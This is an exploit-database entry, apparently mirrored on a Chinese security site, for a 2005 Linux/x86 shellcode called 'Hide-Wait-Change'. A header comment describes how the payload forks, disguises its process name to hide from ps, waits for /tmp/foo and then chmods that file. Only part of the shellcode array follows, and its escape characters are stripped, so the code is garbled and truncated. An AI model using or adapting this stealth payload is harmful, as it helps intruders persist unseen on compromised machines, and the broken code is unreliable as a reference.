Linux/x86 – Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)

Linux/x86 – Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)

漏洞ID 1055377 漏洞类型
发布时间 2005-09-08 更新时间 2005-09-08
图片[1]-Linux/x86 – Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) (1)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
 *          [Mystique Project: Examples of long-term payloads]                *
 *                       hide-wait-change code                                *
 *                 by [email protected]  &  [email protected]                       *
 * This code, upon execution, will perform the following things...            *
 *                                                                            *
 *   1) Fork a new process, and kill PPID via _exit() so we get inherrited    *
 *      by init and now have a new PID.                                       *
 *   2) Will obtain the current location of argv[0] by retrieving information *
 *      from /proc/self/stat.                                                 *
 *   3) Copy the name we wish to masquarade as into argv[0] in memory.        *
 *   4) Call setsid() to establish ourselfs as a process leader.              *
 *   5) Will sleep via nanosleep() for a givin interval of time.              *
 *   6) Will check to see if a file exist via access().                       *
 *   7) If it does not Loop back to step 5                                    *
 *   8) If it does then we chmod() the file with permissions 0455.            *
 *   9) Calls _exit()                                                         *
 *                                                                            *
 *  * steps 3-4 effectivly hide us from most ps-listings                      *
 *                                                                            *
 *   size: 187 + strlen(new-proc-name) + strlen(file-to-change)               *
char shellcode[]=
"/proc/self/statxff"                       // 
"xort and izik rocks the linux boxxff"     // new proc name
"/tmp/fooxff"                              // file to chmod
"x6a"                                      //
"x03"                                      // sleep-time

// [2005-09-08]

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